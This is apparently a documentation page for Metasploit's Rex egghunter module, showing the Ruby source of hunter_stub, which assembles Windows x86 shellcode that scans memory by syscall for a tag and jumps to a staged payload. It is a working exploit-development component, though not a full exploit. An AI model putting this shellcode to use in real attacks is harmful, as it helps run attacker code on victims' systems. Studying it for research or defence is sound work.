Module: Rex::Exploitation::Egghunter::Windows::X86

Defined in:
lib/rex/exploitation/egghunter.rb

Constant Summary collapse

Alias = 
ARCH_X86

Instance Method Summary collapse

Instance Method Details

#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object

The egg hunter stub for win/x86.

Raises:



40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
 
# File 'lib/rex/exploitation/egghunter.rb', line 40

def hunter_stub(payload, badchars = '', opts = {})

	startreg = opts[:startreg]

	raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
	marker = "0x%x" % opts[:eggtag].unpack('V').first

	checksum = checksum_stub(payload, badchars, opts)

	startstub = ''
	if startreg
		if startreg.downcase != 'edx'
			startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr"
		else
			startstub = "\n\tjmp next_addr"
		end
	end
	startstub << "\n\t" if startstub.length > 0

	assembly = <<EOS
#{startstub}
check_readable:
	or dx,0xfff
next_addr:
	inc edx
	push edx
	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
	pop eax
	int 0x2e
	cmp al,5
	pop edx
	je check_readable
check_for_tag:
	; check that the tag matches once
	mov eax,#{marker}
	mov edi,edx
	scasd
	jne next_addr
	; it must match a second time too
	scasd
	jne next_addr

	; check the checksum if the feature is enabled
#{checksum}

	; jump to the payload
	jmp edi
EOS

	assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

	# return the stub
	assembled_code
end